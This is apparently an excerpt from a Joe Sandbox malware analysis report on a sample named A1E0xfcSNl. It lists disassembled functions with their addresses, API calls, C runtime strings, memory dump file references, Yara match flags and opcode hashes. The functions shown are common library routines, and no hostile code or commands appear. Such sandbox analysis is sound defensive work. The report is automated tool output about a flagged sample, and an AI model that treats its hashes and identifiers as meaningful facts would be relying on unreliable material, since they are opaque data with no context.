                                            • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                                            • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                                            • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                            Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Overflow range error (OVERFLOW), xrefs: 00401D00
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-4064033741
                                            • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                                            • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                                            • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                                            • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                            Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-2187435201
                                            • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                                            • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                                            • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                                            • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                                            Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Total loss of significance (TLOSS), xrefs: 00401D20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-4273532761
                                            • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                                            • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                                            • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                                            • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                                            Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Argument singularity (SIGN), xrefs: 00401C78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-2468659920
                                            • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                                            • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                                            • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                                            • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                                            Function 007610C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • calloc.LIBCMT ref: 0076116A
                                              • Part of subcall function 0078E208: _calloc_impl.LIBCMT ref: 0078E218
                                              • Part of subcall function 0078E208: _errno.LIBCMT ref: 0078E22B
                                              • Part of subcall function 0078E208: _errno.LIBCMT ref: 0078E235
                                            • free.LIBCMT ref: 007612F3
                                            • free.LIBCMT ref: 007612FD
                                            • free.LIBCMT ref: 0076130F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_calloc_implcalloc
                                            • String ID:
                                            • API String ID: 4000150058-0
                                            • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                            • Instruction ID: bdf53f4c0c7f838c4a244a14e53fd41a242a1ac30e94eb2be504be724bfbbd18
                                            • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                            • Instruction Fuzzy Hash: E9C1F836608B848AD764CF65E88479E77B4F788B88F54412AEF8E97B18DF38C555CB00
                                            Function 007B1CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • calloc.LIBCMT ref: 007B1D6A
                                              • Part of subcall function 007DEE08: _calloc_impl.LIBCMT ref: 007DEE18
                                              • Part of subcall function 007DEE08: _errno.LIBCMT ref: 007DEE2B
                                              • Part of subcall function 007DEE08: _errno.LIBCMT ref: 007DEE35
                                            • free.LIBCMT ref: 007B1EF3
                                            • free.LIBCMT ref: 007B1EFD
                                            • free.LIBCMT ref: 007B1F0F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_calloc_implcalloc
                                            • String ID:
                                            • API String ID: 4000150058-0
                                            • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                            • Instruction ID: a2906950edc348098c9d064a20900dfcb771f2c9e4e965c551c33715546ef859
                                            • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                            • Instruction Fuzzy Hash: 24C1FA36608B84CAD764CF65E89479E77B4F788B88F50812AEB8D87B18DF78C555CB00
                                            Function 0077A144 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 0077A178
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • free.LIBCMT ref: 0077A2BF
                                            • free.LIBCMT ref: 0077A323
                                            • free.LIBCMT ref: 0077A32F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc
                                            • String ID:
                                            • API String ID: 2761444284-0
                                            • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                            • Instruction ID: 3e9d4147efe63a833427f69a31ed47e844af07dc80f9cb46b6cfe3f3dc51b34c
                                            • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                            • Instruction Fuzzy Hash: 7651ED31304745E6EE28AF22A45436D63A2BBC2BC0F588929EE0E5BB55EF7DD511C702
                                            Function 007CAD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007CAD78
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • free.LIBCMT ref: 007CAEBF
                                            • free.LIBCMT ref: 007CAF23
                                            • free.LIBCMT ref: 007CAF2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$AllocHeap_callnewhmalloc
                                            • String ID:
                                            • API String ID: 3531731211-0
                                            • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                            • Instruction ID: 13e95552511cbde4ada956896dd32555cc21ea104ce943739551274ff1acb991
                                            • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                            • Instruction Fuzzy Hash: 7051E1B530068AA2DA18AB22D458B7D7361FB80BD9F54043EEE0E57B59EF7CD501C701
                                            Function 00763700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc
                                            • String ID:
                                            • API String ID: 2803490479-0
                                            • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                            • Instruction ID: 7756d24aa779409e2f8f08eb25284cc922021df2979e078b313a8529c79c62ac
                                            • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                            • Instruction Fuzzy Hash: 4041AB72B0478287CB58DF26E4546AE77A1F794BC8B548525EE2B87B05EF3CDA05C700
                                            Function 007B4300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc
                                            • String ID:
                                            • API String ID: 2803490479-0
                                            • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                            • Instruction ID: f246a7e8a661c8de9dd0d011c955a88175622dec7d54a380c1e96e7d7ada8de7
                                            • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                            • Instruction Fuzzy Hash: CA41AD723047C097CB19DB26E414BAE77A1F784B88F448529EE6A87B06EF3CD856C700
                                            Function 007C1038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CurrentProcessfreemalloc
                                            • String ID:
                                            • API String ID: 1397824077-0
                                            • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                            • Instruction ID: cbd133aee134034aed69fcbc6f774849524b6b47bc3c4f9de3c6c2c0d02a29e5
                                            • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                            • Instruction Fuzzy Hash: 4D417572714681C6D724DB22E445BAF6351FB897C8F40542DEF8947B4AEF3DC5818710